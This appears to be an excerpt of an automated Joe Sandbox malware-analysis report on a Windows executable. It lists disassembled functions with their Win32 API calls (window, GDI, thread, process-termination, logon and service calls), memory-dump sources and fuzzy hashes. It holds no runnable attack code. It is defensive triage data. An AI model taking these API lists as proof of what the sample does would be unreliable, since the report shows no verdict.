                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 752480666-0
                                                                              • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                              • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                              • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                              • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                              Function 00455212 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                              • String ID:
                                                                              • API String ID: 3275902921-0
                                                                              • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                              • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                              • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                              • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                              Function 00439326 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                              • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                              • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                              • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                              • String ID:
                                                                              • API String ID: 1413079979-0
                                                                              • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                              • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                              • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                              • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                              Function 0041415E Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                              • __calloc_crt.LIBCMT ref: 0041419B
                                                                              • __getptd.LIBCMT ref: 004141A8
                                                                              • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                              • __dosmaperr.LIBCMT ref: 00414201
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1803633139-0
                                                                              • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                              • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                              • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                              • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                              Function 004555E0 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                              • String ID:
                                                                              • API String ID: 3275902921-0
                                                                              • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                              • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                              • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                              • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                              Function 004554C0 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 004554DF
                                                                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 3691411573-0
                                                                              • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                              • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                                              • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                              • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                                              Function 0043609C Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                              • String ID:
                                                                              • API String ID: 1814673581-0
                                                                              • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                              • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                              • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                              • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                              Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                              • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                              • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                              • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                              Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                              • LineTo.GDI32(?,?,?), ref: 00447227
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                              • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                              • EndPath.GDI32(?), ref: 0044724E
                                                                              • StrokePath.GDI32(?), ref: 0044725C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                              • String ID:
                                                                              • API String ID: 372113273-0
                                                                              • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                              • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                              • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                              • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                              Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual
                                                                              • String ID:
                                                                              • API String ID: 4278518827-0
                                                                              • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                              • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                              • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                              • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                              Function 0044CBD3 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0044CBEF
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Release
                                                                              • String ID:
                                                                              • API String ID: 1035833867-0
                                                                              • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                              • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                              • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                              • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                              Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                              • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                              • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                              • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3495660284-0
                                                                              • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                              • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                              • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                              • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                              Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                              • String ID:
                                                                              • API String ID: 839392675-0
                                                                              • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                              • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                              • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                              • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                              Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\r6lOHDg9N9.exe,00000004), ref: 00436055
                                                                              • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                              • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                              • GetLastError.KERNEL32 ref: 00436081
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                              • String ID:
                                                                              • API String ID: 1690418490-0
                                                                              • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                              • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                              • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                              • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                              Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                              • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                              • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                              • CoUninitialize.OLE32 ref: 00475D71
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                              • String ID: .lnk$HH
                                                                              • API String ID: 886957087-3121654589
